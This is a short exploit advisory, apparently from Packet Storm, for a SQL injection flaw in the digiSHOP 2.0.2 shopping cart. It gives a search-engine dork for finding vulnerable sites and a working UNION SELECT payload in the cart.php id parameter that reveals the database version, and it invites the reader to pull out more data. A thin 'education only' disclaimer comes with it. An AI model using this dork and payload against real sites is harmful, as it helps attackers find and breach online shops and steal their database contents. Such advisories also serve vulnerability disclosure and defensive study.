digiSHOP version 2.0.2 suffers from a remote SQL injection vulnerability.
395f71c2bdd06e8de55603a3f29497265374ebf2017560f4be25a4e2414e2008-----------------------------------
TM |
___ ___ _______ |
| Y | ______ | | |
|. 1 ||______||.| | | |
|. _ | `-|. |-' |
|: | | |: | |
|::.|:. | |::.| |
`--- ---' `---' |
Private Place Of 0days |
-----------------------------------
^Exploit Title :
^Date : 23/7/2010
^Vendor Site : http://digishop.digisoft77.com/
^MOD Version : digiSHOP 2.0.2
^Author : Silic0n (science_media017[At]yahoo.com)
^Team Site : www.hacking-truths.net
^Dork : inurl:cart.php?m=features&id=
------------------------------------------------------------------------------
Special Thnanks To Jackh4x0r , Gaurav_raj420 , Mr 52 (7) , Dalsim , Zetra , haZl0oh , root4o, Belma(sweety) ,Danzel,
messsy , ,abronsius ,Nova ,ConsoleFx , Exi , Beenu , R4cal , jaya ,@ry@n,[]0iZy5 & All my friends .
My Frnd Site : www.igniteds.net , www.anti-intruders.org (Will Be Up Very Soon)
----------------------------------->Exploit<----------------------------------
0x1: Goto http://{localhost}/{Shop path}/cart.php?m=features&id=-15+Union+Select+1,2,@@version,4,5,6,7
MySql Version : 4.1.22-log
Now Use Brain.Exe (7) To extract the Other information
this exploit is only education Purpose only ,author or team member is not responsible for any harm
------------------------------------------------------------------------------
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed